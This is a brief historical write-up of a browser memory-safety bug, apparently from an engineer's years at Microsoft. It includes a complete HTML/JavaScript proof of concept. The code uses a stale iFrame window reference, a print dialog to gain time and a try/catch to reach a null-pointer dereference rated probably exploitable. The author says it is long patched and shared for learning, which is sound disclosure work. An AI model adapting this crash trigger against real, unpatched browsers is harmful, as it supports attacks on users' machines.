Timing was the critical element here. By saving a reference to window inside an iFrame, immediately navigating the iFrame away, and then calling a method on the saved reference inside a try/catch, the browser landed in a state where the script context had been torn down but the window object was still partially accessible. The result was a probably-exploitable null-pointer dereference in the cross-domain script context checker.

<!-- iframe.html (loaded inside the iFrame) -->
<script>
function crashMe()
{
    pWindow = window;               // keep a reference to this frame's window
    location.href = "about:blank";  // navigate the frame away immediately
    window.print();                 // print dialog buys time for the navigation to complete
    try
    {
        pWindow.showModalDialog();  // call through the now-stale window reference
    }
    catch (e){}                     // the catch is required to reach the crashing path
}
</script>
<input type="button" onmouseover="crashMe()" value="mouseOver me to Crash!">

<!-- parent page -->
<iframe src="iframe.html" name="iFrame" width="400" height="80"></iframe>

The window.print() call opens the print dialog, which gives the navigation to about:blank enough time to invalidate the document context. When pWindow.showModalDialog() is then called on the stale reference, the engine enters ScriptSite::CheckCrossDomainScriptContext with a null script context pointer and dereferences it. The try/catch is essential — without it the crash takes a different, non-reproducible path. Exploitability was rated PROBABLY_EXPLOITABLE.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.